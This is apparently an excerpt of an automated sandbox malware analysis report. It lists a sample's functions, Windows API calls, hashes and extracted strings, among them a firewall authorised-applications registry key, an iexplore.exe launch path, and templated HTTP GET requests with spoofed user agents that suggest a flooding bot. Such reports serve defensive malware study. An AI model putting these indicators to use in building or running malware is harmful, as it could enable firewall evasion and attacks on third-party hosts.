Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(0000000A), ref: 00405527
ExitThread.KERNEL32 ref: 00405533

Strings

E, xrefs: 00405233
L8@, xrefs: 0040520A
%d.%d.%d.%d, xrefs: 004053F5
[@, xrefs: 004051A9
@, xrefs: 0040524F
8@, xrefs: 0040515C
<6@, xrefs: 004053FB
192.168.1.244, xrefs: 00405168
P, xrefs: 004052D7
p8@, xrefs: 004051BE

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CountExitSleepThreadTickrand
String ID: %d.%d.%d.%d$192.168.1.244$<6@$@$E$L8@$P$p8@$8@$[@
API String ID: 896407411-3061671333
Opcode ID: a9ee2490293e25e91a77c21d2959831a20bb89c8af2e816b72d14c690114d407
Instruction ID: 2acc1ecf18658df22ca3a7ea1314f5fe6e182d61b19c12b6ce0228fb74aabab8
Opcode Fuzzy Hash: a9ee2490293e25e91a77c21d2959831a20bb89c8af2e816b72d14c690114d407
Instruction Fuzzy Hash: 14B19D715083459AE710DF60C845B6FB7E5FFC4708F00492DFA89A7291DBB4AA09CB9B

Function 00479E8D Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 265threadlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00479E81), ref: 00479E8E
GetModuleFileNameA.KERNEL32(00000000,0047CA63,000000C8), ref: 00479EA3
CreateThread.KERNEL32(00000000,00000000,00479652,00000000,00000000), ref: 00479F01
CloseHandle.KERNEL32(?,1C567C50), ref: 00479F0A
CreateThread.KERNEL32(00000000,00000000,Function_00079849,00000000,00000000), ref: 00479FAA
CloseHandle.KERNEL32(?,00000000), ref: 00479FB3
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00479FC0

Part of subcall function 004793C6: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 0047940B
Part of subcall function 004793C6: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 0047942A
Part of subcall function 004793C6: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00479454
Part of subcall function 004793C6: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00479461
Part of subcall function 004793C6: UnmapViewOfFile.KERNEL32(?), ref: 00479479

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00479ECD

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmap
String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3400179232-621207024
Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction ID: fc5581227f9d1d93158e31406331e1dd6f9e64db049df1f60a84647a9d0915b1
Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction Fuzzy Hash: E0A1D271408248BFEB259F248C5EBEE7B6CEF81304F04855AE84D9E182D6F85F45C76A

Function 00404715 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 203sleepprocessthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403C10: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00403C20
Part of subcall function 00403C10: lstrcatA.KERNEL32(?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C35
Part of subcall function 00403C10: lstrcpyA.KERNEL32(?,?,?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C48

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040482E
Sleep.KERNEL32(00001388), ref: 0040483D
Sleep.KERNEL32(0000000A,?,00000000), ref: 0040498D
ExitThread.KERNEL32 ref: 00404997

Strings

GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#, xrefs: 004047E0
GET %s HTTP/1.1Host: %s:%d, xrefs: 004048A2
GET %s HTTP/1.1Host: %s, xrefs: 0040487D
GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 0040492A
%s %s%s, xrefs: 004047A1
D, xrefs: 004047B4
<6@, xrefs: 0040477F
GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 004048E7

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryExitProcessSystemThreadlstrcatlstrcpy
String ID: %s %s%s$<6@$D$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Host: %s$GET %s HTTP/1.1Host: %s:%d$GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#
API String ID: 2825703556-4267235928
Opcode ID: e08e1effa276eb7547b25f3cb29d33cb09f5be14afca26cf21ab89a8ec85cfde
Instruction ID: 3e73d33b29753aa0a0a8c23456e8152a650bf458f26c86c47ab00128547e0a80
Opcode Fuzzy Hash: e08e1effa276eb7547b25f3cb29d33cb09f5be14afca26cf21ab89a8ec85cfde
Instruction Fuzzy Hash: 6D51DAB25443446BD324DB64CD41FFB77A8ABC5704F004D3EF64AA32C1EA75AA048B9B

Function 00404530 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 142sleepthreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00404627
Sleep.KERNEL32(000007D0), ref: 00404632
Sleep.KERNEL32(0000000A), ref: 00404643
ExitThread.KERNEL32 ref: 00404649
Sleep.KERNEL32(00000032,?,00000000), ref: 00404704
ExitThread.KERNEL32 ref: 0040470F

Part of subcall function 00403C10: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00403C20
Part of subcall function 00403C10: lstrcatA.KERNEL32(?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C35
Part of subcall function 00403C10: lstrcpyA.KERNEL32(?,?,?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C48

Strings

GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0, xrefs: 00404692
D, xrefs: 004045DB
%s %s%s, xrefs: 004045BE
<6@, xrefs: 004045C4, 0040469F
GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache, xrefs: 00404673

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Sleep$ExitThread$CreateDirectoryProcessSystemlstrcatlstrcpy
String ID: %s %s%s$<6@$D$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0$GET %s HTTP/1.1Referer: http://%s:80/http://%sHost: %sConnection: CloseCache-Control: no-cache
API String ID: 4106849892-1695404734
Opcode ID: 77bc9a4e8d2d1452da797db159c73d812a404676eedf890ee0f1537427deca61
Instruction ID: aea2a5038014d6908c877e8ed60871dbc4ffd7e4e280d37711b0d24c40857b9e
Opcode Fuzzy Hash: 77bc9a4e8d2d1452da797db159c73d812a404676eedf890ee0f1537427deca61
Instruction Fuzzy Hash: 66416671144345ABD320DB60CD45BEB77A9ABC4704F004D3EF786A32C1DA75A9058B9B

Function 00403920 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 187librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 004039C6
GetLastError.KERNEL32 ref: 004039D2
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00403A05
InterlockedExchange.KERNEL32(?,00000000), ref: 00403A17
LocalAlloc.KERNEL32(00000040,00000008), ref: 00403A2B
FreeLibrary.KERNEL32(00000000), ref: 00403A48
GetProcAddress.KERNEL32(?,?), ref: 00403AA9
GetLastError.KERNEL32 ref: 00403AB5
RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 00403AE7

Strings

$, xrefs: 0040393C

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
